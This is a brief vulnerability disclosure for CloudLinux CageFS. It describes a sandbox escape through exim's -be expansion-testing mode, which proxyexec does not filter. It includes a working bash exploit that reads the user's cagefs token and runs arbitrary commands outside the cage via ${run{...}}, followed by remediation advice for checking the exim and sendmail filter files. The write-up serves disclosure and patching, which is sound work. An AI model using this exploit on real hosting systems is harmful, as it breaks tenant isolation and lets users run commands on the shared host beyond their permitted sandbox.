Vulnerability
Affected software: CloudLinux CageFS, unknown version (old vulnerability from around 2016, I no longer have original report)
CloudLinux CageFS can be bypassed by running exim in expansion testing mode.
Exim in expansion testing mode (-be
) can execute commands through ${run{<command> <args>}{<string1>}{<string2>}}
string expansion. Exim -be
arguments are not filtered by proxyexec before executing exim outside CageFS, allowing user inside CageFS to execute commands outside CageFS.
Exploit
#!/bin/bash
if [[ $# -eq 0 ]]
then
echo "Usage: $0 <command> [arg]..."
exit 1
fi
OUTPUT_FILE=$(mktemp -p "${HOME}")
echo "\${run{/bin/bash -c \"$@ >${OUTPUT_FILE}\"}{foo}{bar}}" | /usr/sbin/proxyexec -c cagefs.sock "$USER" "$(cat /var/.cagefs/.cagefs.token)" "$(pwd)" EXIM -be
cat "${OUTPUT_FILE}"
rm "${OUTPUT_FILE}"
Solution
Update CageFS to unaffected version. Check if -be
and -bem
parameters are filtered in /etc/cagefs/filters/exim.json
and /etc/cagefs/filters/sendmail.json
.
Timeline
Unknown (old vulnerability from around 2016, I no longer have original report, it was fixed around 2016).